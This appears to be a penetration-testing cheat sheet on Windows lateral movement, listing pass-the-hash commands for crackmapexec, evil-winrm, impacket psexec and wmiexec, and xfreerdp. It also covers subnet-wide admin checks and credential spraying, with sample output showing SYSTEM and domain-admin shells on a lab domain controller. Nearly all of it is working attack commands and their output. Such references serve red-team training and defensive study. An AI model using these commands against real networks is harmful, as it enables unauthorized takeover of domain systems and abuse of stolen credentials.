LATERAL MOVEMENT

Pass the hash (crackmapexec)

Authenticate with NTLM hash — No password needed

crackmapexec smb <target> -u <user> -H <ntlm_hash>
Example Output
crackmapexec smb 10.10.10.0/24 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
SMB  10.10.10.5   DC01   [+] Pwn3d!
SMB  10.10.10.20  WEB01  [+] Pwn3d!
SMB  10.10.10.21  DB01   [+] Pwn3d!
SMB  10.10.10.22  FILE01 [-] STATUS_LOGON_FAILURE
(Spray hash across entire domain subnet)

Pass the hash (evil-winrm)

Interactive shell with hash — If WinRM is open (5985)

evil-winrm -i <target> -u <user> -H <ntlm_hash>
Example Output
evil-winrm -i 10.10.10.5 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
*Evil-WinRM* PS C:\Users\Administrator> whoami
corp\administrator
*Evil-WinRM* PS> hostname
DC01
(Interactive PowerShell on the DC with hash)

Pass the hash (psexec)

Get SYSTEM shell — Writes to ADMIN$ share

impacket-psexec <domain>/<user>@<target> -hashes :<ntlm_hash>
Example Output
impacket-psexec corp.local/administrator@10.10.10.5 -hashes :31d6cfe0d16ae931b...
[*] Requesting shares on 10.10.10.5
[*] Found writable share ADMIN$
C:\Windows\system32> whoami
nt authority\system

Pass the hash (wmiexec)

Semi-interactive shell — Stealthier than psexec

impacket-wmiexec <domain>/<user>@<target> -hashes :<ntlm_hash>
Example Output
impacket-wmiexec corp.local/administrator@10.10.10.5 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0
[*] SMBv3.0 dialect used
C:\> whoami
corp\administrator
(Stealthier than psexec - uses WMI, no service created)

RDP with hash

GUI access with hash — Restricted Admin mode must be on

xfreerdp /u:<user> /pth:<ntlm_hash> /v:<target>
Example Output
xfreerdp /u:admin /pth:31d6cfe0d... /v:10.10.10.5
[INFO] Connected to 10.10.10.5
(Full GUI desktop, no password needed)
Note: Restricted Admin must be enabled on target

Check admin access on subnet

Which machines can you admin? — Map your access

crackmapexec smb <subnet>/24 -u <user> -p <pass> --local-auth
Example Output
crackmapexec smb 10.10.10.0/24 -u john -p Password1
SMB  10.10.10.5   445  DC01   [+] corp\john (Pwn3d!)
SMB  10.10.10.20  445  WEB01  [+] corp\john (Pwn3d!)
SMB  10.10.10.21  445  DB01   [-] corp\john
(Admin on DC01 and WEB01)

Spray cracked creds everywhere

Password reuse across machines — People reuse passwords

crackmapexec smb <subnet>/24 -u <user> -p <pass>
Example Output
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'SQLServiceP@ss!'
10.10.10.5  [+] (Pwn3d!)
10.10.10.20 [+] (Pwn3d!)
10.10.10.21 [+] (Pwn3d!)
(Service account has admin on multiple servers)